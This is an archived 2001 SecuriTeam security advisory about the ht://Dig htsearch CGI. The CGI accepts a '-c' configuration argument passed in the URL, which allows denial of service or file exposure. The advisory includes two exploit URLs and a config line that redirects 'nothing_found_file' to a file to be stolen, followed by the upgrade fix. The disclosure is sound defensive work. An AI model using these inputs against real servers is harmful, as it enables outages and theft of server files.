[UNIX] Security Bug Found in ht://Dig htsearch CGI (DoS, File Exposure)
From: support@securiteam.comDate: 10/16/01
- Previous message: support@securiteam.com: "[NT] Account Management Vulnerabilities in Ipswitch IMail Server"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Subject: [UNIX] Security Bug Found in ht://Dig htsearch CGI (DoS, File Exposure) Message-Id: <20011016170343.0FC5B138C1@mail.der-keiler.de> Date: Tue, 16 Oct 2001 19:03:43 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Security Bug Found in ht://Dig htsearch CGI (DoS, File Exposure)
------------------------------------------------------------------------
SUMMARY
The <http://sourceforge.net/projects/htdig/> ht://Dig system is a
complete indexing and searching system for a domain or Intranet. A
security vulnerability in the product allows attackers to either cause the
program to stop responding, or to cause it to reveal the content of
sensitive files.
DETAILS
Vulnerable systems:
htDig version 3.1.0b2 and more recent, including 3.1.5 and 3.2.0b3
Immune systems:
htDig version 3.1.6 or 3.2.0b4
The htsearch CGI runs as both the CGI and as a command-line program. The
command-line program accepts the -c [filename] to read in an alternate
configuration file. On the other hand, no filtering is done to stop the
CGI program from taking command-line arguments, so a remote user can force
the CGI to stall until it times out (resulting in a DoS) or read in a
different configuration file.
For a remote exposure, a specified configuration file would need to be
readable via the web server UID, e.g. via anonymous FTP with upload
enabled or samba world-readable log files are the possible targets) to
potentially retrieve files readable by the web server UID.
For example:
nothing_found_file: /path/to/the/file/we/steal
Exploit:
http://your.host/cgi-bin/htsearch?-c/dev/zero
http://your.host/cgi-bin/htsearch?-c/path/to/my.file
Fix:
Upgrade to current prerelease versions of 3.1.6 or 3.2.0b4.
ADDITIONAL INFORMATION
The information has been provided by <mailto:ghutchis@wso.williams.edu>
Geoff Hutchison.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NT] Account Management Vulnerabilities in Ipswitch IMail Server"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
